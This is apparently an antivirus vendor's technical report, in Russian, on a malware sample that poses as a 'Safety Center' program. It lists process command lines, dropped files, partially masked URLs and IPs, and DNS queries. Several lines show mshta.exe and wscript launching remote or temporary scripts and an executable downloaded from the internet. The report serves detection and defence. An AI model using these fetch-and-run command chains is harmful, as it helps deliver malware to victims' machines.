Техническая информация
(Адреса и параметры в списке ниже частично заменены символами «#».)
Командные строки процессов:
- '<SYSTEM32>\wscript.exe' "%TEMP%\akjsdkjsakldklasj.js"
- '<Текущая директория>\temp.exe' (загружен из сети Интернет)
- '<SYSTEM32>\mshta.exe' http://ur###nam.net/8732489273.php
- '<SYSTEM32>\mshta.exe' http://21#.#5.78.66/install.php?id##########
Файлы (пути на диске):
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\2VAZY7AN\u4[1].exe
- <Текущая директория>\temp.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\8732489273[1].php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\install[1].php
- %TEMP%\akjsdkjsakldklasj.js
Сетевые адреса (хост:порт):
- 'ur###nam.net':80
- 'localhost':1045
- '22#.#96.59.24':80
- 'localhost':1039
- '21#.#5.78.66':80
- 'localhost':1042
URL-адреса:
- http://22#.#96.59.24/u4.exe
- http://ur###nam.net/8732489273.php
- http://21#.#5.78.66/install.php?id##########
DNS-запросы:
- DNS ASK ur###nam.net
Окна (класс и заголовок):
- ClassName: 'TForm1' WindowName: 'Safety Center'
- ClassName: 'Shell_TrayWnd' WindowName: ''